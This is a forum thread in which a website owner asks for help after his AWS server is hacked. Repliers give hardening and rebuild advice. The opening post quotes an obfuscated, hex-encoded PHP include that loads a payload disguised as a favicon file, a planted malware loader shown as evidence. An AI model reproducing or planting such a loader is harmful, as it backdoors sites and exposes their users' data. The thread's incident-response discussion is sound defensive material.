Website hacked

greatchap

Weaksauce
Joined
Mar 22, 2012
Messages
97
Hello,

I developed a new website which I installed in a new server and just two days ago pointed the domain to that server. The site is running okay. Earlier I used to test the site using ip address and once satisfied I pointed domain to new server. Last x months of testing didn't reveal anything major just small bugs.

However strange things are happening now such as index.html being renamed to index.html.bak.bak and index.php is appearing.

Following code is appearing in index.php and in existing index.php new code is being added such as :

<?php
/*6e980*/

@include "\x2fh\x6fm\x65/\x732\x61n\x61l\x79t\x69c\x73/\x70u\x62l\x69c\x5fh\x74m\x6c/\x54A\x53c\x65n\x61r\x69o\x2fQ\x75e\x72y\x2ff\x61v\x69c\x6fn\x5fa\x365\x399\x65.\x69c\x6f";

/*6e980*/

echo file_get_contents('index.html.bak.bak');

Suddenly i observed a folder namely forum got created with a lone php file called 5w4xg.php

It is a linux server running on AWS. I think its either been hacked or has malware.

I am advised to
- Install SSL
- Website can have SiteLock (https://www.sitelock.com/) for regular scan of website files and database.
- Website can have Comodo Web Application firewall on the server which will prevent from SQL and XSS attacks.
- Install ClamAV anti virus for cPanel.

While someone is saying on install SSL, ClamAV and Wordfence.

What to do ?

I also have following ports open :
TCP 21 0.0.0.0/0
TCP 21 ::/0
TCP 22 0.0.0.0/0
TCP 25 0.0.0.0/0
TCP 25 ::/0
TCP 53 0.0.0.0/0
TCP 53 ::/0
TCP 80 0.0.0.0/0
TCP 80 ::/0
TCP 110 0.0.0.0/0
TCP 110 ::/0
TCP 143 0.0.0.0/0
TCP 143 ::/0
TCP 443 0.0.0.0/0
TCP 443 ::/0
TCP 465 0.0.0.0/0
TCP 465 ::/0
TCP 587 0.0.0.0/0
TCP 587 ::/0

I need ports only for :
a) uploading files from my workplace
b) connecting to MySQL db
c) mail system to work

Please advice what can I do and something that's involves minimal cost. Are too may unwanted posts open.

Thank you,

Regards,
GR
 
Joined
Jul 22, 2005
Messages
656
instead of putting a server like that on the internet, maybe create private AWS network and use VPN instead to connect? that way you dont have to have the server open to the net.
 

Haven

Supreme [H]ardness
Joined
Oct 11, 2002
Messages
6,409
Change your security profile. Lock down port 22 to only be accessible from your work IP address. No one else needs access to those. My AWS instance can only be SSHed into from my home, and my work.

Turn off Port 21 completely, you don't need it. If you need to transfer a file use SCP instead. I would also turn off port 110, 143. I would instead use the Secure IMAP instead.

Next change your password. Change all the account passwords (root, default account, your account, etc). Check for ~/.ssh/authorised_keys to make sure they can't use keys to get back in.

Are you running any type of CMS? If so make sure it and ALL of its plugins are up to date. Get on the security mailing lists for the CMS.

Make sure the OS is up to date as well. (apt-get update, aptituede or yum update, I can't remember which Amazon Linux is based off).

Make sure all accounts are good strong passwords.

These are the things I can think of off the top of my head.
 

bman212121

[H]ard|Gawd
Joined
Aug 18, 2011
Messages
1,815
What's the actual purpose of this server? Does it run multiple services or is it just a web server? if it's just a web server the only ports that should be open are TCP 80 and 443. And 80 should just have a permanent redirection to 443 anyway. At this point if you left SSH open to the world and used a weak root password, I would just blow that server away and start over. Who knows what else has been done on it, so you're far better off just starting from scratch.

To add to Haven's point, if there is some type of web management software to whatever front end you're using, make sure there are no default passwords on that either. If you can navigate to a specific URL and just type in a default password to manage your CMS, that's no good either.
 

Dead Parrot

2[H]4U
Joined
Mar 4, 2013
Messages
2,831
Put the server in question behind a separate firewall. Allow only the ports needed through to the server. Further limit access from only those IP addresses authorized.

Basic security is if the service isn't needed, turn it off, block it, log any attempts to activate it.
 

greatchap

Weaksauce
Joined
Mar 22, 2012
Messages
97
Thank you for your replies. The actual purpose of the server is to run my website. It hosts website and users data. The cms is codeigniter and wordpress for blog.

I am thinking of doing the following :
1) Installing SSL
2) ClamAV antivirus
3) Tell me if I should put Wordfence or any other firewall
4) Port wise as I mentioned I need to upload files and access the db so tell me which ports I can shut off such as 22, 21 etc without interrupting file transfer

Any other advice you have for the server since you know it will run my site.
 

Schro

Supreme [H]ardness
Joined
Mar 15, 2002
Messages
7,948
1. SSL won't fix the problems that you have (it only protects data in transit between the server and the user)
2. AV won't fix the problems you have
3. You have a ton of ports open to the internet, closing them with the included AWS tools is sufficient
4. Ports other than 80 and 443 (and maybe the mail ports) should be restricted to only your IP

It's likely that you've got default accounts or passwords on privileged accounts that have allowed your server to get pwnt. At this point, who knows what has infected it, so if you're not fluent in sorting that out on the server, you'll likely want to rebuild a new one from scratch that has not been compromised. On the new one, you'll want to change all default passwords and block ports that aren't needed for your users (and follow the other good advice in this thread).
 

bman212121

[H]ard|Gawd
Joined
Aug 18, 2011
Messages
1,815
Thank you for your replies. The actual purpose of the server is to run my website. It hosts website and users data. The cms is codeigniter and wordpress for blog.

I am thinking of doing the following :
1) Installing SSL
2) ClamAV antivirus
3) Tell me if I should put Wordfence or any other firewall
4) Port wise as I mentioned I need to upload files and access the db so tell me which ports I can shut off such as 22, 21 etc without interrupting file transfer

Any other advice you have for the server since you know it will run my site.

If you need to access the shell of the server, the ONLY port you need is TCP / 22. One again like Haven said, that should ONLY be accessible from your IP, or perhaps not at all. I'd imagine there is a way in AWS to get to the console of the server, so you might be able to do certain things through there like access the database. You should not be using FTP for any types of file transfer at all. If you need to upload content learn how to use SFTP or SCP from a terminal, or if you're on Windows WinSCP will do everything you could need.

For wordpress it sounds like http://*servername*/wp-admin will bring you to the login dialog. If you didn't install Wordpress yourself, then chances are good that it was installed with a default user password. Bots will scrape your site looking for hints that wordpress exists, and attempt a connection to the admin page as it is well known and likely has a default user / pass, or AWS uses a default user / pass for their setup.

http://www.wpbeginner.com/glossary/admin-area/

There's also a good chance you could be using PHP, so you might also have http://*servername*/phpmyadmin. That would be another vector that could be compromised if it's using default user / pass.

Best I can tell is that codeigniter doesn't have a default web admin page, so you are probably okay there.

For firewall you can just use the built in IPtables. There is likely a GUI front end you can use to setup rules for you if you don't know exactly what to do. I would definitely suggest DigitalOcean for copy / paste rules as they have tons of good info.



These are probably of interest to you:

SFTP:
https://www.digitalocean.com/commun...-securely-transfer-files-with-a-remote-server

Firewall rules for Web traffic:
https://www.digitalocean.com/commun...essentials-common-firewall-rules-and-commands


Like Schro said AV won't fix your problems at all. AV doesn't stop remote attacks that appear to be legitimate if they are using valid login credentials. SSL won't fix your issues either, but you have to use SSL for ANYTHING that requires a login, otherwise you are sending the user / pass combo in plain text across the internet.
 

greatchap

Weaksauce
Joined
Mar 22, 2012
Messages
97
Thank you for your help. Actually my .net program uploads files in the website of uses the normal upload command/syntax of .net. But you are right I should be at least be re-directing those ports to my ip.

Currently the following ports are open: 80,2083,143,465,53 (DNS),443,2095,110,22,21,25,53,3306,587,587,2087. This includes mail ports.

I think I will close most ports except IMAP ports and two or three ports you guys have specified. Ftp port to point to my ip. Delete all the data (files) and upload fresh files, change all passwords.

Install ClamAV and please suggest 1 firewall software such as Sitepoint or whatever you think is good. If you want me to install a scanner let me know.

The server runs php and main cms is code igniter and only the blog runs on wordpress. I am not a linux or server admin so need to get this work done by some freelancer. Let me know if I am missing something.
 
D

Deleted member 88227

Guest
You need to reinstall from scratch. Delete everything and start over. Obviously you're not capable of knowing exactly what all is compromised and how to get rid of it. Installing those "programs" isn't going to fix your current situation. They may help prevent a future break in attempt, but it's not going to reverse the damages already done.

Delete everything. Start over.
 

greatchap

Weaksauce
Joined
Mar 22, 2012
Messages
97
If i use filezilla to delete all the files and install fresh ones wont that work. Are you telling me to format the server and re-install the os also.
 

ChristianVirtual

[H]ard DCOTM x3
Joined
Feb 23, 2013
Messages
2,561
I also install fail2ban which helps a bit to slow down intruder while trying passwords ... might not protect fully but sure slow down ....
 
D

Deleted member 88227

Guest
Since you don't know how they got in at this point you can't determine that only the web site user is compromised. You need to assume the entire server is compromised therefore reformatting and reinstalling the operating system is the only approach you should be taking.

Unless you can prove to yourself that the intruder was limited to only what was accessible by the user account that owns the site would it be advised to delete the user and all it's files and starting over.

You need to reinstall the operating system. Then read some tutorials on how to harden a server to prevent such attacks or at least slow them down before making it public again.
 

wolfofone

Gawd
Joined
Aug 15, 2010
Messages
725
I also install fail2ban which helps a bit to slow down intruder while trying passwords ... might not protect fully but sure slow down ....
wordfence is a good wordpress firewall plugin that iirc will limit wp-admin login attempts and can be configured to protect the whole server. there are simple linux options too,read the digital ocean guides on hardening.

As for fail2ban, you should set up SSH such that root can not even be directly logged in (you can use sudo / su or the AWS Console if you need root). Further password auth should be disabled on your normal account as well and only password protected ssh keypairs should be allowed to authenticate ssh login. You should still set strong passwords even if they are not used for remote logins.
if you are using mysql with wordpress be sure to run mysql_secure_installation security script.
 

Haven

Supreme [H]ardness
Joined
Oct 11, 2002
Messages
6,409
SQL should never be accessible from the outside world, only from 127.0.0.1. Setting up PHPMyAdmin is a great way to access the MySQL. If you want to make it really secure, set up where PHPMyAdmin can only be access via 127.0.0.1, and setup SSH Tunneling. You can also setup /wp-admin/ to only be accessible the same way. Any web based management system can be setup to be accessible via SSH Tunnelling.
 

wolfofone

Gawd
Joined
Aug 15, 2010
Messages
725
Good to know though if possible id avoid installing web stuff like webmin or phpmyadmin in the first place to reduce attack vectors, not everyone wants to deal with mysql and other website management tasks on the command line though which i also understand. Just make sure to keep them up to date and lock them down as much as possible. phpmyadmin is much easier to use and fhere are days i miss it :)
 

greatchap

Weaksauce
Joined
Mar 22, 2012
Messages
97
Thank you guys for your inputs. I have finished doing some work on server. This is what is it :

1) Removed all data
2) Copied fresh files
3) Installed ClamAV
4) Installed CSF firewall
5) Enabled SSL
6) Ports such as FTP/SSH now are IP specific

The server seems to be running okay now. I did not format it or re-install OS but just deleted my data.

Since I am not a Linux admin I got some of them done.

All I get is some emails such as
1) lfd on whm.domain.com: Suspicious process running under user <name>
2) Excessive resource usage

Time: Mon Dec 25 10:32:16 2017 +0530
Account:
Resource: Process Time
Exceeded: 7317 > 1800 (seconds)
Executable: /usr/bin/perl
Command Line: proc
PID: 13417 (Parent PID:13417)
Killed: No
 

Haven

Supreme [H]ardness
Joined
Oct 11, 2002
Messages
6,409
Since you didn't wipe the server and start fresh, did you at least check the /etc/passwd to make sure no new accounts were created? Did you check /tmp to make sure there wasn't anything in there that shouldn't have been? Did you verify all binaries matched the MD5sum of the distribution? Did you check to make sure there were no rogue processes running?

Another tool to install is rkhunter, though doing this before the server is compromised is recommended. After, it is the equivelent of closing the barn door after the horses have left the barn.
 

Schro

Supreme [H]ardness
Joined
Mar 15, 2002
Messages
7,948
The server seems to be running okay now. I did not format it or re-install OS but just deleted my data.

Yet, since your server was compromised in a way that was not determined, you don't know that it has truly been cleaned off. Given the work you did on it, it would have been just as fast to blow it away and re-image it before doing all that.
 
Joined
Jul 22, 2005
Messages
656
man you gotta nuke your server and start over dude, i dont see what you dont understand about that, if you dont know how to do that, or dont want to, i feel bad for anyone using any of your services. Nuke the server, rebuild it, and this time, do it with that suggestions everyone else made, use the web for helpful guides to securing servers, AWS has tools to create vpn networks so you can just leave all the ports you want open but on the the ppp0 interface, and VPN into the same LAN as it and do all your management that way. You reticence is going to cost you in the end, as bots always poke for things, but eventually it will be a person behind that port scanner, or a well designed bot that will drop some clever malware you cant find. The fact that you have wordpress alone leaves you open to the current "json mining droppers" so please, PLEASE listen to these people.
 

wolfofone

Gawd
Joined
Aug 15, 2010
Messages
725
Indeed i baeely know what im doing with Kali Linux and its tools -- watch some ethical hacking videos the automated attacks alone should scare you into following security best practices from the start. You dont know what kinfs of backdoor or rootkit the hackers slipped into your server. Time to nuke it from orbit and start and harden from scratch.
 

greatchap

Weaksauce
Joined
Mar 22, 2012
Messages
97
Thank you for your help guys.

I know formatting or setting up a new server is an option that most of you guys are recommnending. However I did some analysis of server log and more along with someone who knows linux and server area. I found a cron that was running and it was the reason for the suspicious emails I was getting from CSF. I deleted the cron and the folder where it was. The server is working fine now. Initial inspection to look for malware etc has not revealed anything now.

I feel the server is OK now. All password have been changed as well. This live server runs my site, files and db. The php settings also had to be tweaked to let the newsite run. Setting up the whole thing on a new server will take lot of effort. As of now I feel the server is ok but if something comes up again I may setup a new server. Thank you everyone for your help. It made a difference. :)
 

wolfofone

Gawd
Joined
Aug 15, 2010
Messages
725
CYA might be a good bash script to look into as a next best backup option if you cant take a image of the server or your host doesnt offer anapshotting
 

Cmustang87

Supreme [H]ardness
Joined
Oct 4, 2007
Messages
4,498
Thank you for your replies. The actual purpose of the server is to run my website. It hosts website and users data..

If this is is the server's use and you failed to take the proper actions to remediate and protect your user's data, this is hazardously irresponsible.
 

greatchap

Weaksauce
Joined
Mar 22, 2012
Messages
97
The server is running okay. There has been no breach or malware every since I got it fixed. :)
 
Top